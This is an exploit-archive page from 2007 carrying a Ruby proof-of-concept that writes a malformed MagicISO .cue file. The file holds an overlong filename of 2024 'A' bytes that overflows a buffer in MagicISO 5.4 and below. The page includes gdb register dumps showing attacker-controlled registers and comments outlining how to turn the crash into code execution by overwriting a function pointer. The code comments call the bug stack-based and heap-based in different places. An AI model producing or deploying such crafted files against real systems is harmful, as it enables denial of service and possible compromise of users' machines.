exploit the possibilities

magiciso-dos.txt

magiciso-dos.txt
Posted May 21, 2007
Authored by n00b

MagicISO versions 5.4 and below .cue file heap overflow proof of concept exploit.

tags | exploit, denial of service, overflow, proof of concept
MD5 | 52df0c52c21829e3791e7f532b7f1db9

magiciso-dos.txt

Change Mirror Download
#!/usr/bin/env ruby
###################################
#Credits to n00b for finding this bug.
#Magic iso has a stacked based buffer over-flow when
#We pass an overly-long file name inside the .cue file
#We are able to control alot of the registers so
#Command execution is possible,But im still learning
#Which means this will get released as a dos poc for
#now till i can get the help i need..Any way i will provide
#The dubug info for you to see for your self..If any one
#Decides to write a Local exploit for this please give
#Credits to n00b..Ok on with the work of info collecting.
#Vendor : http://www.magiciso.com/
#Tested on win xp sp2.
#I would also like to thank the people i emailed and pm about this
#Shouts: ~ Str0ke ~ Marsu ~ SM ~ Aelphaeis ~ vade79
# Thanx to all you guys who helped.
###################################
#...Debug info..
# Program received signal SIGSEGV, Segmentation fault.
# [Switching to thread 1092.0x314]
# 0x0058f05e in ?? ()
# (gdb) i r
# eax 0x41414141 1094795585
# ecx 0x41414141 1094795585
# edx 0x41414141 1094795585
# ebx 0x41414545 1094796613
# esp 0x12f5c8 0x12f5c8
# ebp 0x12f5ec 0x12f5ec
# esi 0xf4e718 16049944
# edi 0xf4eb1c 16050972
# eip 0x58f05e 0x58f05e
# eflags 0x10206 66054
# cs 0x1b 27
# ss 0x23 35
# ds 0x23 35
# es 0x23 35
# fs 0x3b 59
# gs 0x0 0
# fctrl 0xffff1273 -60813
# fstat 0xffff0000 -65536
# ftag 0xffffffff -1
# fiseg 0x0 0
# fioff 0x0 0
# foseg 0xffff0000 -65536
# fooff 0x0 0
# ---Type <return> to continue, or q <return> to quit---
# fop 0x0 0
# (gdb)
###################################
#As you can see from the debug info we control eax ecx edx..
#The two registers shown, EAX and ECX, can be populated with user supplied addresses which are a part of the data that
#is used to overflow the heap buffer. One of the address can be of a function pointer which needs to be overwritten, for
#example UEF and the other can be address of user supplied code that needs to be executed.

$VERBOSE=nil #~ Shut the fuck up Let me do it my way ruby's over-zealous warnings..

Header1 =
"\x46\x49\x4c\x45\x20\x22"


Bof = 'A'* 2024

Header2 = "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20"+
"\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32"+
"\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31"+
"\x20\x30\x30\x3a\x30\x30\x3a\x30\x30"

n00b = Header1 + Bof + Header2

File.open( "MagicISO.cue", "w" ) do |the_file|

the_file.puts (n00b)

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    3 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close